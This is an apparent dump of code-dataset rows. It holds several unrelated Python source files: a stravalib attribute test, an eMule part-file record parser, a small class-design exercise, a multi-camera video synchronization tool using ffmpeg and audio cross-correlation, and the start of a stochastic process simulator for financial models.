seq_id stringlengths 4 11 | text stringlengths 113 2.92M | repo_name stringlengths 4 125 ⌀ | sub_path stringlengths 3 214 | file_name stringlengths 3 160 | file_ext stringclasses 18
values | file_size_in_byte int64 113 2.92M | program_lang stringclasses 1
value | lang stringclasses 93
values | doc_type stringclasses 1
value | stars int64 0 179k ⌀ | dataset stringclasses 3
values | pt stringclasses 78
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
14854443648 | from __future__ import absolute_import, unicode_literals
from stravalib.attributes import EntityAttribute, SUMMARY, DETAILED
from stravalib.model import Athlete
from stravalib.tests import TestBase
class EntityAttributeTest(TestBase):
def setUp(self):
super(EntityAttributeTest, self).setUp()
def test_unmarshal_non_ascii_chars(self):
NON_ASCII_DATA = {
u'profile': u'http://dgalywyr863hv.cloudfront.net/pictures/athletes/874283/198397/1/large.jpg',
u'city': u'Ljubljana',
u'premium': True,
u'firstname': u'Bla\u017e',
u'updated_at': u'2014-05-13T06:16:29Z',
u'lastname': u'Vizjak',
u'created_at': u'2012-08-01T07:49:43Z',
u'follower': None,
u'sex': u'M',
u'state': u'Ljubljana',
u'country': u'Slovenia',
u'resource_state': 2,
u'profile_medium': u'http://dgalywyr863hv.cloudfront.net/pictures/athletes/874283/198397/1/medium.jpg',
u'id': 874283,
u'friend': None
}
athlete = EntityAttribute(Athlete, (SUMMARY, DETAILED))
athlete.unmarshal(NON_ASCII_DATA)
| swuerth/StravaDevChallenge | strava-club-highlights-gcloud/env/lib/python2.7/site-packages/stravalib/tests/test_attributes.py | test_attributes.py | py | 1,187 | python | en | code | 0 | github-code | 13 |
2839469983 | #-*- coding: utf-8 -*-
from .constant import *
from .function import formatDateTime, formatSize
from .tag import Tag
class Area:
InvalidPosition = 0xFFFFFFFFFFFFFFFF
def __init__(self):
self.start = Area.InvalidPosition
self.end = Area.InvalidPosition
class Record:
ModifTime = 1
FileHash = 2
PartHashs = 3
FileSize = 4
def __init__(self):
self.head = {}
self.body = {}
self.taglist = []
self.arealist = [] # incomplete
def getFileSize(self):
return self.body[FT_FILESIZE]
def isLargeFile(self):
return self.getFileSize() > OLD_MAX_IN_SIZE
def getFileHash(self)->str:
return self.head[Record.FileHash].hex().upper()
def getAichHash(self)->str:
return self.body.get(FT_AICH_HASH, "None")
def getFileName(self):
return self.body[FT_FILENAME].strip().replace(" ", "_")
def getPartName(self)->str:
return self.body.get(FT_PARTFILENAME, "None")
def getFormatModifTime(self):
return formatDateTime(self.head.get(Record.ModifTime, 0))
def getFormatLastSeenComplete(self):
return formatDateTime(self.body.get(FT_LASTSEENCOMPLETE, 0))
def getFormatProgress(self):
fsize = self.getFileSize()
complete = fsize
for area in self.arealist:
complete -= area.end - area.start
assert(complete >= 0)
if complete == fsize:
return "100%% (%s)" % (formatSize(fsize),)
percent = "%.2f" % (complete*100/fsize,)
if percent.startswith("100"):
percent = "99.99"
return "%s%% (%s/%s)" % (percent, formatSize(complete), formatSize(fsize))
def getEd2kPartCount(self):
return len(self.head[Record.PartHashs])
def getEd2kLink(self):
return "ed2k://|file|%s|%s|%s|/" % (self.getFileName(),
self.getFileSize(),
self.getFileHash())
def load(self, reader):
self.loadModifTime(reader)
self.loadHashs(reader)
self.loadTags(reader)
def loadModifTime(self, reader):
self.head[Record.ModifTime] = reader.readUint32()
def loadHashs(self, reader, loadFileHashOnly=False):
self.head[Record.FileHash] = reader.readHash()
self.head[Record.PartHashs] = []
if loadFileHashOnly:
return
hashcount = reader.readUint16()
hashlist = [reader.readHash() for _ in range(0, hashcount)]
if hashcount > 1:
import hashlib
md4 = hashlib.new("md4")
for h in hashlist: md4.update(h)
assert(self.head[Record.FileHash] == md4.digest())
self.head[Record.PartHashs] = hashlist
elif hashcount == 1:
assert(self.head[Record.FileHash] == hashlist[0])
self.head[Record.PartHashs] = hashlist
else:
pass
def loadTags(self, reader, isnewstyle=False, partmettype=PMT_DEFAULTOLD):
areadict = {}
tagcount = reader.readUint32()
for _ in range(0, tagcount):
tag = Tag(reader)
if tag.name_id is None:
self.taglist.append(tag)
elif tag.name_id == FT_FILENAME:
assert(tag.isStr())
self.body.setdefault(tag.name_id, tag.value)
elif tag.name_id == FT_PARTFILENAME:
assert(tag.isStr())
self.body[tag.name_id] = tag.value
elif tag.name_id in (FT_FILESIZE,FT_COMPRESSION,FT_TRANSFERRED):
assert(tag.isInt())
self.body[tag.name_id] = tag.value
elif tag.name_id in (FT_LASTSEENCOMPLETE,FT_LASTDATAUPDATE):
assert(tag.isInt())
self.body[tag.name_id] = tag.value
elif tag.name_id == FT_DL_ACTIVE_TIME:
assert(tag.isInt())
self.body[tag.name_id] = tag.value
elif tag.name_id == FT_STATUS:
assert(tag.isInt())
if tag.value == 0:
self.body[tag.name_id] = "Downloading"
else:
self.body[tag.name_id] = "Paused Or Stopped"
elif tag.name_id == FT_FILETYPE:
assert(tag.isStr())
self.body[tag.name_id] = tag.value
elif tag.name_id in (FT_CORRUPTED, FT_CATEGORY, FT_MAXSOURCES):
assert(tag.isInt())
self.body[tag.name_id] = tag.value
elif tag.name_id in (FT_DLPRIORITY, FT_OLDDLPRIORITY):
assert(tag.isInt())
v = tag.value
if not isnewstyle:
if v == PR_AUTO:
v = PR_HIGH
elif not v in (PR_LOW,PR_NORMAL,PR_HIGH):
v = PR_NORMAL
self.body[FT_DLPRIORITY] = v
elif tag.name_id in (FT_ULPRIORITY, FT_OLDULPRIORITY):
assert(tag.isInt())
v = tag.value
if not isnewstyle:
if v == PR_AUTO:
v = PR_HIGH
elif not v in (PR_LOW,PR_NORMAL,PR_HIGH):
v = PR_NORMAL
self.body[FT_ULPRIORITY] = v
elif tag.name_id == FT_KADLASTPUBLISHSRC:
assert(tag.isInt())
### SetLastPublishTimeKadSrc(tag.value, IPv4Address(0))
self.body[tag.name_id] = tag.value
elif tag.name_id == FT_KADLASTPUBLISHNOTES:
assert(tag.isInt())
### SetLastPublishTimeKadNotes(tag.value)
self.body[tag.name_id] = tag.value
elif tag.name_id == FT_DL_PREVIEW:
assert(tag.isInt())
### SetPreviewPrio(((tag->GetInt() >> 0) & 0x01) == 1);
### SetPauseOnPreview(((tag->GetInt() >> 1) & 0x01) == 1);
# TODO
self.body[tag.name_id] = tag.value
elif tag.name_id == FT_ATREQUESTED:
assert(tag.isInt())
### statistic.SetAllTimeRequests(tag.value)
self.body[tag.name_id] = tag.value
elif tag.name_id == FT_ATACCEPTED:
assert(tag.isInt())
### statistic.SetAllTimeAccepts(tag.value)
self.body[tag.name_id] = tag.value
elif tag.name_id == FT_ATTRANSFERRED:
assert(tag.isInt())
### statistic.SetAllTimeTransferred(tag.value)
self.body[tag.name_id] = tag.value
elif tag.name_id == FT_ATTRANSFERREDHI:
assert(tag.isInt())
### low = statistic.GetAllTimeTransferred()
### hi = tag.value << 32
### statistic.SetAllTimeTransferred(low + hi)
# TODO
self.body[tag.name_id] = str(tag.value)
elif tag.name_id == FT_CORRUPTEDPARTS:
assert(tag.isStr())
self.body[tag.name_id] = tag.value
elif tag.name_id == FT_AICH_HASH:
assert(tag.isStr())
assert(len(tag.value) == 32)
assert(tag.value.isalnum())
self.body[tag.name_id] = tag.value
elif tag.name_id == FT_AICHHASHSET:
assert(tag.type_ == TAGTYPE_BLOB)
# TODO
# print(tag.value, file=sys.stderr)
elif tag.name_id in (FT_PERMISSIONS, FT_KADLASTPUBLISHKEY):
### old tags: as long as they are not needed,
### take the chance to purge them.
assert(tag.isInt())
self.body[tag.name_id] = tag.value
else:
if (tag.name_id == 0 and tag.isInt()
and tag.name != None and len(tag.name) > 1
and tag.name[0] in (FT_GAPSTART, FT_GAPEND)):
key = int(tag.name[1:])
assert(key >= 0)
area = areadict.setdefault(key, Area())
if tag.name[0] == FT_GAPSTART:
area.start = tag.value
else:
area.end = tag.value
else:
self.taglist.append(tag)
if 0:
if tag.name:
pformat("Tag Name:", tag.name)
else:
pformat("Tag Name ID:", NameIdDict[tag.name_id])
pformat("Tag Type:", TagTypeDict[tag.type_])
pformat("Tag value:", tag.value)
print("---------------------------------------------")
#TODO
self.arealist = sorted(areadict.values(), key=lambda x:x.start)
| gefranks/amuletools | record.py | record.py | py | 8,932 | python | en | code | 0 | github-code | 13 |
72366449617 |
class Group:
def __init__(self,name):
self.name = name
def addMembers(self,m1, m2,m3):
self.member1 = m1
self.member2 = m2
self.member3 = m3
def getInfo(self):
print("Group name: ", self.name)
print("Members : ")
print(self.member1.getInfo())
print(self.member2.getInfo())
print(self.member3.getInfo())
class Member:
def __init__(self, name, birth_year):
self.name = name
self.birth_year = birth_year
def getInfo(self):
return self.name + "born in " +str(self.birth_year)
group1 = Group("NUmber1")
memberA = Member("karim", 1988)
memberB = Member("suzon", 1992)
memberC = Member("Abdul", 1991)
group1.addMembers(memberA,memberB,memberC)
print(memberA.getInfo)
group1.getInfo()
| karimsuzon/Developing-Python-Application | week8_UML_CODE_GROUP_MEMBER.py | week8_UML_CODE_GROUP_MEMBER.py | py | 796 | python | en | code | 0 | github-code | 13 |
32402704385 | import subprocess
import json
import os
import sys
import cv2
from scipy.io import wavfile
import time
import numpy as np
from scipy.signal import fftconvolve
from lib import ImageProcessingFunctions as ip
import shutil
import pickle
import datetime
class SyncVideoSet:
def __init__(self, path_in, mode=1):
print('---------- INITIALIZE SYNCHRONIZATION ----------')
print('Start analyzing deployment found in', path_in)
# Define input output paths for the deployment
temp = path_in.split('/')
output_name = temp[-3] + '_' + temp[-2] + '_' + temp[-1]
cd = os.getcwd()
self.filename = cd + '/results/deployments/' + output_name + '.pkl'
self.output_name = temp[-3] + '_' + temp[-2] + '_' + temp[-1]
self.path_in = path_in
self.path_out = path_in
self.mode = mode
self.recut_videos = False
self.single_video_mode = False
# Get the camera and video names from the sub-folders
print('Read video folders...')
if os.path.isdir(path_in):
camera_names = np.sort(os.listdir(path_in))
video_names = [None] * len(camera_names)
for idx in range(len(camera_names)):
video_names[idx] = np.sort(os.listdir(path_in + '/' + camera_names[idx]))
self.flag_folder_input = True
else:
print("I/O error: path does not exist")
sys.exit()
# Variables to store info on deployment
self.camera_names = camera_names
self.number_of_cameras = int(len(camera_names))
self.number_of_videos = [None] * self.number_of_cameras
self.base_code = [None] * self.number_of_cameras
self.calibration_video_names = [None] * self.number_of_cameras
self.video_names = video_names
self.fps = [None] * self.number_of_cameras
self.sample_rate_audio = [None] * self.number_of_cameras
self.duration = [None] * self.number_of_cameras
self.width = [None] * self.number_of_cameras
self.height = [None] * self.number_of_cameras
self.audio_channels = []
self.lag_out_cal = []
self.lag_out = []
self.lag_matrix = []
self.lag_matrix_calibration = []
self.flag_same_inputs = []
self.calib_interval = []
self.stereo_parameters = []
# If analysed before, load data
if os.path.exists(self.filename):
self.load()
print('data imported from', self.filename)
return
# Get base-code from the second, full video and remove all videos not containing this code
print('Clean folders...')
get_video_base_code(self)
remove_additional_videos(self)
# Get meta deta from videos
print('Get metadata...')
load_meta_data(self)
# Verify input data
print('Verify input data...')
verify_input_data(self)
# After verification of the input data we can reduce list values to single values
self.duration = self.duration[0]
self.fps = self.fps[0]
self.height = self.height[0]
self.width = self.width[0]
self.codec_preset = 'ultrafast'
def get_time_lag(self, method='maximum', number_of_video_chapters_to_evaluate=4, force_recalculating=False):
print('---------- FIND TIME LAG BETWEEN VIDEOS ----------')
if any(self.lag_out) and not force_recalculating:
print('Lag data was imported')
else:
self.lag_matrix = get_time_lag_matrix(self, method, number_of_video_chapters_to_evaluate)
# Determine final lag values
lag_out_all, lag_out_cal_all = get_lag_vector_from_matrix(self, self.lag_matrix, self.single_video_mode)
lag_out_all = lag_out_all / self.fps
if self.mode == 0:
self.lag_out_cal = lag_out_cal_all / self.fps
self.lag_out = lag_out_all
# Get time lag between calibration videos when
if self.mode == 1 and np.sum(self.lag_matrix_calibration) == 0:
self.lag_matrix_calibration = get_time_lag_matrix(self, method='calibration_video',
number_of_video_chapters_to_evaluate=1)
lag_out_single, lag_out_cal_single = get_lag_vector_from_matrix(self, self.lag_matrix_calibration, True)
self.lag_out_cal = lag_out_cal_single / self.fps
self.save()
def cut_and_merge_videos(self, merge=False):
print('---------- CUT AND MERGE VIDEO CHAPTERS ----------')
if self.recut_videos:
cut_calibration_videos_mode_0(self, False)
if merge:
merge_synced_videos(self)
clean_video_names(self)
self.save()
def get_calibration_videos(self):
print('---------- EXTRACT SYNCED CALIBRATION VIDEOS ----------')
if self.mode == 0:
cut_calibration_videos_mode_0(self, True)
clean_video_names(self)
else:
cut_calibration_videos(self)
self.save()
def detect_calibration_videos(self):
print('---------- DETECT CALIBRATION VIDEOS ----------')
if any(v is None for v in self.calibration_video_names):
detect_calibration_videos(self)
else:
print('Calibration data was imported')
self.save()
def compute_3d_matrices(self, square_size_mm='30', save_folder='results/calib_results'):
if not os.path.exists(save_folder):
os.makedirs(save_folder)
if self.single_video_mode:
compute_3d_matrices_matlab_single_video(self, square_size_mm, save_folder)
else:
compute_3d_matrices_matlab(self)
self.save()
def generate_images_from_calibration_video(self, frames_per_x_sec):
generate_calibration_images(self, frames_per_x_sec)
def load(self):
'Loads all data from a stucture'
with open(self.filename, 'rb') as input:
temp = pickle.load(input)
self.calib_interval = temp.calib_interval
self.calibration_video_names = temp.calibration_video_names
self.lag_out = temp.lag_out
self.lag_matrix = temp.lag_matrix
self.lag_out_cal = temp.lag_out_cal
self.lag_matrix_calibration = temp.lag_matrix_calibration
self.camera_names = temp.camera_names
self.number_of_cameras = temp.number_of_cameras
self.number_of_videos = temp.number_of_videos
self.base_code = temp.base_code
self.calibration_video_names = temp.calibration_video_names
self.video_names = temp.video_names
self.fps = temp.fps
self.sample_rate_audio = temp.sample_rate_audio
self.duration = temp.duration
self.width = temp.width
self.height = temp.height
self.audio_channels = temp.audio_channels
self.lag_out_cal = temp.lag_out_cal
self.lag_out = temp.lag_out
self.lag_matrix = temp.lag_matrix
self.lag_matrix_calibration = temp.lag_matrix_calibration
self.flag_same_inputs = temp.flag_same_inputs
self.calib_interval = temp.calib_interval
try:
self.stereo_parameters = temp.stereo_parameters
except:
pass
return self
def save(self):
f = open(self.filename, 'wb')
pickle.dump(self, f, 2)
f.close()
def get_video_base_code(self):
if self.single_video_mode:
find_base_code = "GH01"
else:
find_base_code = "GH03"
for i in range(self.number_of_cameras):
base_code_video = [s for s in self.video_names[i] if (find_base_code in s and ".MP4" in s and "._G" not in s)]
if not base_code_video:
base_code_video = [s for s in self.video_names[i] if
(find_base_code.replace('H', 'X') in s and ".MP4" in s and "._G" not in s)]
if base_code_video:
self.base_code[i] = base_code_video[0][4:8]
else:
self.base_code[i] = []
return self
def remove_additional_videos(params):
for i in range(params.number_of_cameras):
files_to_delete = [s for s in params.video_names[i][:] if (not (".MP4" in s or ".mp4" in s)
or "._GH" in s
or "._GX" in s)]
for file_name in files_to_delete:
if os.path.exists(params.path_in + str('/') + params.camera_names[i] + str('/') + file_name):
print('REMOVED: ', params.path_in + str('/') + params.camera_names[i] + str('/') + file_name)
os.remove(params.path_in + str('/') + params.camera_names[i] + str('/') + file_name)
if os.path.isdir(params.path_in):
camera_names = np.sort(os.listdir(params.path_in))
# Replace name list with new names
for idx in range(len(camera_names)):
params.video_names[idx] = np.sort(os.listdir(params.path_in + '/' + camera_names[idx]))
params.number_of_videos = [len(name) for name in params.video_names]
return params
def load_meta_data(self):
for idx in range(self.number_of_cameras):
if self.mode == 0:
video_file = self.path_in + str('/') + self.camera_names[idx] + str('/') + self.video_names[idx][0]
else:
max_idx = len(self.video_names[idx][:]) - 1
video_file = self.path_in + str('/') + self.camera_names[idx] + str('/') + self.video_names[idx][
min(10, max_idx)]
temp_file = os.path.splitext(video_file)[0] + '.json'
subprocess.run(
'ffprobe -v quiet -print_format json -show_format -show_streams {} > {}'.format(video_file, temp_file),
shell=True)
metadata = json.load(open(temp_file, 'r'))
os.remove(temp_file)
fps = np.array(metadata['streams'][0]['r_frame_rate'].split('/')).astype(int)
self.audio_channels = int(metadata['streams'][1]['channels'])
self.fps[idx] = fps[0] / fps[1]
self.sample_rate_audio = int(metadata['streams'][1]['sample_rate'])
self.duration[idx] = float((metadata['streams'][1]['duration']))
self.width[idx] = (metadata['streams'][0]['width'])
self.height[idx] = (metadata['streams'][0]['height'])
def verify_input_data(self):
flag_fps = len(np.unique(self.fps)) == 1
flag_resolution = len(np.unique(self.width)) == 1
self.flag_same_inputs = flag_fps and flag_resolution
if self.flag_same_inputs:
print('All ' + str(self.number_of_cameras) + ' cameras have the following settings: ')
print('Fps: ' + str(np.round(self.fps[0])))
print('Resolution: ' + str(self.width[0]) + ' X ' + str(self.height[0]))
else:
print('The ' + str(self.number_of_cameras) + ' cameras do not have the same settings')
print('Fps: ' + str(np.round(self.fps)))
print('Resolution: ' + str(self.width) + ' X ' + str(self.height))
if np.min(self.number_of_videos) < 1:
print('One of the cameras has ', str(np.min(self.number_of_videos)), 'video(s). At least 2 are needed. Verify '
'if the correct folder is addressed')
self.flag_folder_input = False
def extract_audio(self, video_file):
print('Audio extracted from', video_file)
temp_file = os.path.splitext(video_file)[0] + '.wav'
subprocess.run('ffmpeg -y -v quiet -i {} -vn -c:a pcm_s16le -ss {} -t {} {}'.format(video_file,
0,
self.duration,
temp_file),
shell=True)
sample_rate, signal = wavfile.read(temp_file)
os.remove(temp_file)
return signal.mean(axis=1)
def get_shifted_matrix(mat):
sx, sy = mat.shape
out = np.zeros((sx, sy))
for i in range(sx):
out[i, :] = mat[i, :] + mat[0, i]
return out
def get_lag_vector_from_matrix(params, lag_matrix, single_video_mode):
lag_matrix_frames = np.round(lag_matrix * params.fps)
rows = np.where(np.arange(len(lag_matrix_frames[:, 0])) % params.number_of_cameras == 1)
rows = np.tile(rows, 1).transpose()
lag_out = np.zeros(params.number_of_cameras)
if not single_video_mode:
for i in range(1, params.number_of_cameras):
if i % 2 == 1:
values, counts = np.unique(
np.concatenate([(lag_matrix_frames[:, i]), np.squeeze(lag_matrix_frames[rows, i])]),
return_counts=True)
else:
values, counts = np.unique(lag_matrix_frames[:, i], return_counts=True)
lag_out[i] = values[np.argmax(counts)]
else:
lag_out = lag_matrix_frames[0, :]
lag_out_all = lag_out - np.min(lag_out)
lag_out_calibration = np.zeros(params.number_of_cameras)
for i in range(int(params.number_of_cameras / 2)):
lag_out_calibration[i * 2:(i + 1) * 2] = lag_out[i * 2:(i + 1) * 2] - min(lag_out[i * 2:(i + 1) * 2])
return lag_out_all, lag_out_calibration
def cut_calibration_videos_mode_0(params, only_calibration):
ts = time.time()
for i in range(params.number_of_cameras):
path_in = params.path_in + '/' + params.camera_names[i] + '/' + params.video_names[i][0]
path_out = params.path_in + '/' + params.camera_names[i] + '/' + os.path.splitext(params.video_names[i][0])[
0] + '_cut.mp4'
path_out_cal = params.path_in + '/' + params.camera_names[i] + '/' + os.path.splitext(params.video_names[i][0])[
0] + '_cut_cal.mp4'
if not only_calibration:
print(np.round(time.time() - ts, 2), 's >> Cutting video', path_out, '...')
ip.trim_video(path_in, path_out, params.lag_out[i], params.duration)
print(np.round(time.time() - ts, 2), 's >> Cutting video', path_out_cal, '...')
ip.trim_video(path_in, path_out_cal, params.lag_out_cal[i], params.duration)
def merge_synced_videos(params):
ts = time.time()
for idx_camera_num in range(params.number_of_cameras):
print(np.round(time.time() - ts, 2), 's >> Merging videos for: ',
params.path_in + '/' + params.camera_names[idx_camera_num])
# make merge list
folder_path = params.path_in + '/' + params.camera_names[idx_camera_num]
filenames = np.sort(os.listdir(folder_path))
cut_found = False
with open(folder_path + '/merge_list.txt', 'w') as f:
for line in filenames:
if '01' + params.base_code[idx_camera_num] in line:
cut_found = True
if '_cut' in line and '_cal' not in line:
f.write('file \'' + folder_path + '/' + line + '\'')
f.write('\n')
elif params.base_code[idx_camera_num] in line:
f.write('file \'' + folder_path + '/' + line + '\'')
f.write('\n')
if not cut_found:
print('No video name containing _cut found')
sys.exit()
if os.path.exists(params.path_out + '/Camera_' + params.camera_names[idx_camera_num] + '.mp4'):
os.remove(params.path_out + '/Camera_' + params.camera_names[idx_camera_num] + '.mp4')
if not os.path.exists(params.path_out):
os.makedirs(params.path_out)
ip.merge_videos(params.path_out + '/Camera_' + params.camera_names[idx_camera_num] + '.mp4', folder_path +
'/merge_list.txt')
def get_time_lag_matrix(params, method, number_of_video_chapters_to_evaluate):
ts = time.time()
video_names = []
for i in range(params.number_of_cameras):
temp = []
for name in params.video_names[i][:]:
if params.base_code[i] in name:
temp.append(name)
video_names.append(temp)
if method == 'maximum':
itr_max = int(np.min(params.number_of_videos) - 1)
elif method == 'custom':
itr_max = min(number_of_video_chapters_to_evaluate, np.min(params.number_of_videos) - 1)
elif method == 'calibration_video':
itr_max = 1
video_names = np.array([[params.calibration_video_names[0]], [params.calibration_video_names[1]]])
else:
print('ERROR: no correct method is assigned. Use either ''maximum'' or ''custom''')
sys.exit()
if params.single_video_mode:
itr_max = 1
out = np.zeros((params.number_of_cameras * itr_max, params.number_of_cameras))
for itr_video in range(itr_max):
print(np.round(time.time() - ts, 2), 's >> Analysing audio of video ', itr_video * params.number_of_cameras + 0
+ 1, '/', itr_max * params.number_of_cameras)
# Pick video file name
itr_camera = 0
video_file = params.path_in + str('/') + params.camera_names[itr_camera] + str('/') + \
video_names[itr_camera][itr_video]
res_audio = extract_audio(params, video_file)
y = np.zeros((len(res_audio), params.number_of_cameras))
max_length = len(res_audio)
y[:len(res_audio), 0] = res_audio
if params.number_of_cameras > 2:
for i in range(1, params.number_of_cameras):
print(np.round(time.time() - ts, 2), 's >> Analysing audio of video ',
itr_video * params.number_of_cameras + i + 1, '/', itr_max * params.number_of_cameras)
itr_camera = i
video_file = params.path_in + str('/') + params.camera_names[itr_camera] + str('/') + \
video_names[itr_camera][itr_video]
res_audio = extract_audio(params, video_file)
y[:len(res_audio), i] = res_audio
else:
print(np.round(time.time() - ts, 2), 's >> Analysing audio of video ',
itr_video * params.number_of_cameras + i + 1, '/', itr_max * params.number_of_cameras)
video_file = params.path_in + str('/') + params.camera_names[1] + str('/') + \
video_names[1][itr_video]
res_audio = extract_audio(params, video_file)
y[:min(len(res_audio), max_length), i] = res_audio[:min(len(res_audio), max_length)]
lag = np.zeros((params.number_of_cameras, params.number_of_cameras))
for k in range(params.number_of_cameras):
for m in range(params.number_of_cameras):
corr = fftconvolve(y[:, k], y[::-1, m], mode='full')
offset = np.argmax(corr)
lag[k, m] = ((2 * y[:, k].size - 1) // 2 - offset) / int(params.sample_rate_audio)
out[itr_video * params.number_of_cameras:(itr_video + 1) * params.number_of_cameras, :] = get_shifted_matrix(
lag)
return out
def clean_video_names(params):
# Re-index video names
for idx in range(params.number_of_cameras):
params.video_names[idx] = np.sort(os.listdir(params.path_in + '/' + params.camera_names[idx]))
# Index calibration videos and remove names from original video list
for i in range(params.number_of_cameras):
temp = params.video_names[i][:]
j = 0
while j < len(temp):
if 'cut_cal' in temp[j]:
params.calibration_video_names[i] = temp[j]
if 'cut' in temp[j]:
temp = np.delete(temp, j)
j -= 1
j += 1
params.video_names[i] = np.sort(temp)
params.number_of_videos[i] = j
return params
def compute_3d_matrices_matlab(params):
for set_number in range(params.number_of_cameras // 2):
name1 = params.path_in + '/' + params.camera_names[set_number * 2] + '/' + \
params.calibration_video_names[set_number * 2]
name2 = params.path_in + '/' + params.camera_names[set_number * 2 + 1] + '/' + \
params.calibration_video_names[set_number * 2 + 1]
folder_names = params.path_in.split('/')
save_folder = 'results/calib_results/' + folder_names[-3] + '_' + folder_names[-2] + '_' + folder_names[-1] + \
'_' + params.camera_names[set_number * 2] + params.camera_names[set_number * 2 + 1]
if not os.path.exists(save_folder):
os.makedirs(save_folder)
os.system(
params.path_to_matlab + ' -nodesktop -nosplash -r "python_run_matlab_camera_calibration(\'' + name1 +
'\',\'' + name2 + '\',\'' + save_folder + '\')"')
def generate_calibration_images(params, frames_per_x_sec):
name1 = os.path.join(params.path_in, params.camera_names[0], params.calibration_video_names[0])
name2 = os.path.join(params.path_in, params.camera_names[1], params.calibration_video_names[1])
folder = 'images/calib_images'
# Clean folders
for filename in os.listdir(folder):
file_path = os.path.join(folder, filename)
try:
if os.path.isfile(file_path) or os.path.islink(file_path):
os.unlink(file_path)
elif os.path.isdir(file_path):
shutil.rmtree(file_path)
except Exception as e:
print('Failed to delete %s. Reason: %s' % (file_path, e))
ip.extract_frames(name1, frames_per_x_sec, folder=folder)
ip.extract_frames(name2, frames_per_x_sec, folder=folder)
def compute_3d_matrices_matlab_single_video(params, squareSizeMM, save_folder):
base_name = os.path.splitext(os.path.basename(params.calibration_video_names[0]))[0]
output_directory1 = os.path.join('images/calib_images', base_name)
base_name = os.path.splitext(os.path.basename(params.calibration_video_names[0]))[0]
output_directory2 = os.path.join('images/calib_images', base_name)
os.system(
params.path_to_matlab + ' -nodesktop -nosplash -r "python_run_code_calib_videos(\'' + output_directory1 +
'\',\'' + output_directory2 + '\',\'' + str(params.height) + '\',\'' + str(
params.width) + '\',\'' + squareSizeMM +
'\',\'' + save_folder + '\')"')
def detect_calibration_videos(deployment):
for filename in os.listdir('images/temp_detect_calib_video'):
file_path = os.path.join('images/temp_detect_calib_video', filename)
try:
if os.path.isfile(file_path) or os.path.islink(file_path):
os.unlink(file_path)
elif os.path.isdir(file_path):
shutil.rmtree(file_path)
except Exception as e:
print('Failed to delete %s. Reason: %s' % (file_path, e))
for i in range(deployment.number_of_cameras):
files = deployment.video_names[i][:]
potential_calib_videos = []
if not deployment.base_code[i]:
return
for name in files:
if ('.mp4' or '.MP4' in name) and (name[4:8] < deployment.base_code[i]):
path = os.path.join(deployment.path_in, deployment.camera_names[i], name)
temp_file = os.path.splitext(name)[0] + '.json'
subprocess.run(
'ffprobe -v quiet -print_format json -show_format -show_streams {} > {}'.format(path, temp_file),
shell=True)
metadata = json.load(open(temp_file, 'r'))
os.remove(temp_file)
duration = float((metadata['streams'][1]['duration']))
if duration > 60:
potential_calib_videos.append(name)
delta_t = 4
for j in range(len(potential_calib_videos)):
path_in = os.path.join(deployment.path_in, deployment.camera_names[i], potential_calib_videos[j])
img_folder = ip.extract_frames(path_in, delta_t, folder='images/temp_detect_calib_video')
rows = 8 # number of checkerboard rows.
columns = 11 # number of checkerboard columns.
img_dir_list = os.listdir(img_folder)
t_detect = []
t = 0
for img_name in img_dir_list:
img = cv2.imread(os.path.join(img_folder, img_name), 0)
ret, corners = cv2.findChessboardCorners(img, (rows, columns), None)
if ret:
t_detect.append(t)
t += delta_t
print('Searching for checkerboards image at time: ', str(datetime.timedelta(seconds=t)))
if len(t_detect) > 1:
interval_calib_video = [max(0, min(t_detect) - delta_t), max(t_detect) + delta_t]
deployment.calibration_video_names[i] = potential_calib_videos[j]
deployment.calib_interval.append(interval_calib_video)
def cut_calibration_videos(params):
c = 0
for name in params.calibration_video_names:
temp = name.split('.')
path_input = os.path.join(params.path_in, params.camera_names[c], name)
if '_cal' not in temp[0]:
path_output = os.path.join(params.path_in, params.camera_names[c], temp[0] + '_cal.' + temp[1])
params.calibration_video_names[c] = temp[0] + '_cal.' + temp[1]
cal_video_name = temp[1]
else:
path_output = os.path.join(params.path_in, params.camera_names[c], name)
cal_video_name = name
if os.path.exists(path_output):
print('Calibration video', cal_video_name,
'was found. Delete this file to re-sync video')
else:
intervals = np.array(params.calib_interval)
s_start = params.lag_out_cal[c] + min(intervals[:, 0])
s_end = params.lag_out_cal[c] + max(intervals[:, 1])
ip.cut_video(path_input, path_output, s_start, s_end)
c += 1
def list_all_deployments(path_in):
init_list = os.listdir(path_in)
all_deployments = []
for l in init_list:
subdir = os.listdir(os.path.join(path_in, l))
for k in subdir:
all_deployments.append(os.path.join(path_in, l, k))
return all_deployments
| lkoopmans/3D_reconstruction_stationary_array | lib/SyncVideoSet.py | SyncVideoSet.py | py | 26,269 | python | en | code | 0 | github-code | 13 |
4320583991 | ##############################################################################
# Copyright (C) 2018, 2019, 2020 Dominic O'Kane
##############################################################################
from math import sqrt, exp, log
from enum import Enum
from numba import njit, float64, int64
import numpy as np
from ..utils.error import FinError
from ..utils.math import norminvcdf
###############################################################################
class ProcessTypes(Enum):
GBM = 1
CIR = 2
HESTON = 3
VASICEK = 4
CEV = 5
JUMP_DIFFUSION = 6
###############################################################################
class FinProcessSimulator():
def __init__(self):
pass
def get_process(
self,
process_type,
t,
model_params,
numAnnSteps,
num_paths,
seed):
if process_type == ProcessTypes.GBM:
(stock_price, drift, volatility, scheme) = model_params
paths = get_gbm_paths(num_paths, numAnnSteps, t, drift,
stock_price, volatility, scheme.value, seed)
return paths
elif process_type == ProcessTypes.HESTON:
(stock_price, drift, v0, kappa, theta,
sigma, rho, scheme) = model_params
paths = get_heston_paths(num_paths,
numAnnSteps,
t,
drift,
stock_price,
v0,
kappa,
theta,
sigma,
rho,
scheme.value,
seed)
return paths
elif process_type == ProcessTypes.VASICEK:
(r0, kappa, theta, sigma, scheme) = model_params
paths = get_vasicek_paths(
num_paths,
numAnnSteps,
t,
r0,
kappa,
theta,
sigma,
scheme.value,
seed)
return paths
elif process_type == ProcessTypes.CIR:
(r0, kappa, theta, sigma, scheme) = model_params
paths = get_cir_paths(num_paths, numAnnSteps, t,
r0, kappa, theta, sigma, scheme.value, seed)
return paths
else:
raise FinError("Unknown process" + str(process_type))
###############################################################################
class FinHestonNumericalScheme(Enum):
EULER = 1
EULERLOG = 2
QUADEXP = 3
###############################################################################
@njit(float64[:, :](int64, int64, float64, float64, float64, float64, float64,
float64, float64, float64, int64, int64),
cache=True, fastmath=True)
def get_heston_paths(num_paths,
numAnnSteps,
t,
drift,
s0,
v0,
kappa,
theta,
sigma,
rho,
scheme,
seed):
np.random.seed(seed)
dt = 1.0 / numAnnSteps
num_steps = int(t / dt)
sPaths = np.empty(shape=(num_paths, num_steps + 1))
sPaths[:, 0] = s0
